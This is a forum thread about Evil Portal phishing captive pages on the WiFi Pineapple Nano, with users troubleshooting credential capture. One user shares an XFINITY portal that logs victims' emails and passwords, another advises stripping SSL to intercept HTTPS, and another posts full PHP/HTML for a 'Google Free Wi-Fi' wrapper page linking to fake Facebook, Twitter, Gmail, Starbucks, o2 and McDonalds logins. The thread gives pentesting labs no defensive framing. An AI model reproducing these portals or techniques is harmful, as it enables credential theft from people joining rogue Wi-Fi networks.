Evil Portals

kleo

@aryakangler I was able to get it to work just fine.

First of all, I'm no expert at this.  I learn from all of you.

Regarding your issue, so the client is able to login & the creds are saved onto your nano but you would like it to "redirect" to a specific page?

If that's your issue, the problem is in your   "Myportal.php" file.

On 10/7/2017 at 1:11 AM, cheeto said:

Hi, it's because the page you're accessing is https

try accessing an http page with your evil Portal up and running.  the page should be intercepted by EP. 

Cheers 

So EvilPortal only works with http? How will I be able to intercept https traffic as well?

8 hours ago, jtkrl said:

So EvilPortal only works with http? How will I be able to intercept https traffic as well?

You don't. You strip away the SSL first.

Intercepting HTTPS traffic without stripping away the SSL is no good, it's highly encrypted.

Can anyone tell me how I can upload images for a portal to a folder on the nano? I'm using W10.

Thanks in advance!

EDIT: So I managed to upload the files using FileZilla, but the next problem is: Devices that connect to my PineApple can see the evil portal, but it doesn't show the images. It looks like it can't access the images.

Edited by Jasper

On 11/9/2017 at 1:46 PM, Jasper said:

Can anyone tell me how I can upload images for a portal to a folder on the nano? I'm using W10.

Thanks in advance!

EDIT: So I managed to upload the files using FileZilla, but the next problem is: Devices that connect to my PineApple can see the evil portal, but it doesn't show the images. It looks like it can't access the images.

check the code of the index.php to see what the source (src=) is for the image tags.

• 2 weeks later...
  • 5 weeks later...

Hey, I made a simple XFINITY portal to grab XFINITY credentials.

Should work right off the bat, appends logs in the format of: 

XFINITY CREDS:
Email: USEREMAIL
Password: USERPASS

You can include it in your rep if you'd like, going to add more here whenever I finish them:

Index of /EP

Screenshot:

2TpE8q5.png

Edited by MooreR
  • Like 1

Just now, kbeflo said:

It could have some more improvements.

I'd suggest a responsive page, that can work on both desktop and mobile devices.

You could also copy the original login page from xfinity

Oops, forgot to grab the image. haha, must be rendering off my router gateway. I'll update that.

There, added the logo.

I know it could be responsive, but I literally just copied the whole CSS and everything from the original xfinity router login. That'll at least make it much more authenticate to users who may be used to it ? Haha. It should work for now.

• 4 weeks later...
  • 3 weeks later...

Hi @kbeflo, first of all thanks for your work!

Unfortunately I am having problems getting your Portals to work. I tried the EvilPortal versions 2.1 and 3.0 beta on the Pineapple Nano with Firmware 2.0.2. The portal shows up and I can submit a username and password.  After submitting I am redirected to a page saying "You have been authorized successfully."  (which as I understand is a problem with EvilPortal itself).

BUT the username and password are not being saved in the file /sd/evilportal-logs/facebook-login.txt. I did set the permissions for this file to 755 and I also tried to make it work by removing the checks in the function handleAuthorization() in the file MyPortal.php. I do not believe that it is an issue with EvilPortal as the XFINITY portal by MooreR does manage to save the data to its specified file and the test portal by EvilPortal does work as well.

Do you have some ideas on what I could try to make it work? I have 0 experience with PHP and wanted to check with you first before I try random things. Thanks!

18 hours ago, kbeflo said:

@tuwat just tested the fb-login portal, working well from here.

Try a reset on the Pineapple

I factory-reset the pineapple and moved everything to internal storage and now it works, thanks.  Must have been some other module interfering.

• 1 month later...

Hi all,

I've managed to create a wrapper site to use several portals at once.

The main problem was the limited amount of space using pineapple nano.

Even if I can install the EvilPortal module on the sd card, I was not able to move the portals on the sd card.

Solution: I've manged to mount a share from the sd card within the Evilportal directory on the internal storage using this cmd:

mount /dev/sda1 ~/portals/wrapper-login-all/mnt

the wrapper-login-all is basically a simple portal with the following definition as index.php which i use to redirect to the other portals

<?php
$destination = "http://" . $_SERVER['HTTP_HOST'] . $_SERVER['HTTP_URI'] . "";
require_once('helper.php');
?>

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=394, user-scalable=no">
<title>Sign In - Google Free Wi-Fi</title>
<link rel="stylesheet" type="text/css" href="assets/css/styles.css">
<link rel="icon" type="image/png" href="assets/img/f8593y1ses.png"/>

<script src="jquery-2.2.1.min.js"></script>
<script type="text/javascript">
  function redirect() {
    setTimeout(function() {
      window.location = "/captiveportal/index.php";
    }, 100);
  }
</script>

</head>
<body>
<form novalidate action="/captiveportal/index.php" method="POST" onsubmit="redirect()">

<style>
body {background-color: powderblue;}
h1   {color: blue;}
p    {color: red;}
a {color: white;
font-family: Helvetica, Arial, Sans-Serif;
font-weight: bold;
text-decoration: none;
}

.my {
margin: auto;
text-align: center;
width: 250px;
}

.bord{
background-color: blue;
border: 2px solid #a1a1a1;
border-radius: 40px;
}
#fb {background: #3b5999; padding: 10px;}
#tw {background: #1dcaff; padding: 10px;}
#gm {background: #EC4C3F; padding: 10px;}

#sb {background: #00592D; padding: 10px;}
#o2 {background: #4B77BE; padding: 10px;}
#mc {background: #D52B1E; padding: 10px;}

</style>

<div class="my">
<p class="bord" id= "fb"><a href="mnt/modules/EvilPortal/portals/facebook-login/index.php">Login with Facebook</a></p>
<p class="bord" id= "tw"><a href="/mnt/modules/EvilPortal/portals/twitter-login/index.php">Login with Twitter</a></p>
<p class="bord" id= "gm"><a href="/mnt/modules/EvilPortal/portals/google-login/index.php">Login with Gmail</a></p>

<p class="bord" id= "sb"><a href="mnt/modules/EvilPortal/portals/starbucks-login/index.php">Login with Starbucks</a></p>
<p class="bord" id= "o2"><a href="/mnt/modules/EvilPortal/portals/o2-login/index.php">Login with o2</a></p>
<p class="bord" id= "mc"><a href="/mnt/modules/EvilPortal/portals/mcdonalds-login/index.php">Login with McDonalds</a></p>
</div>    

</form>
<footer>
</footer>
<script>document.onload = function() { document.getElementById("user").focus();};</script>
</body>
</html>

This all works like charme ? but....

my problem now is that I can't mount the sd card on start up.

I've tried executing the mount /dev/sda1 ~/portals/wrapper-login-all/mnt cmd from /etc/rc.local but did not work.

Then I found the onsuccess file within the portals and tried putting the cmd there.

#!/bin/bash

# Commands in this file are ran when a portal is activated and when Evil Portal startup on boot.
mount /dev/sda1 /root/portals/wrapper-login-all/mnt
# You can use any interpreter you want to, the default is bash.

But it is still not working. After each reboot I need to connect via ssh and execute the command manually.

Any ideas?

Cheers,

Don

• 2 weeks later...

Hi everybody,

I have a question concerning Evil portals on my pineapple Nano:

I installed the module ton the SD card, and the dependencies also on the sd card.

When I create a new portal, the file is created directly on the root folder, instead of being installed on the sd card.

Other modules work directly on the sd card.  I don't understand this issue. I tried both a factory reset and formatting the sd card.

Someone could help me please?

Thanks a lot.

Michael

On 5/28/2018 at 4:50 AM, cheeto said:

hey guys, the new firmware update somehow disables credentials captured that appear in the GUI.

They are being captured but not displayed in the GUI.

Any fix to this?

Cheers

Looks like they removed the pineapple command, unfortunately I couldn't find the doco or changelog about this.

I had to take the code in /usr/bin/pineapple/notify (which is in PHP), and wrap a new PHP function around it, then include it and call it in MyPortal.php.

Hope someone comes up with a better way to do this.

• Upvote 1

• 4 months later...

So I appreciate all your work and have spent alot of time reading however, I get the modules to load but after a user enters credentials the user gets the "you are not authorized message" also the credentials are not logged. Its possible im not looking in the right place but I literally moved your modules to my nano using filezilla, anything I could have missed thanks!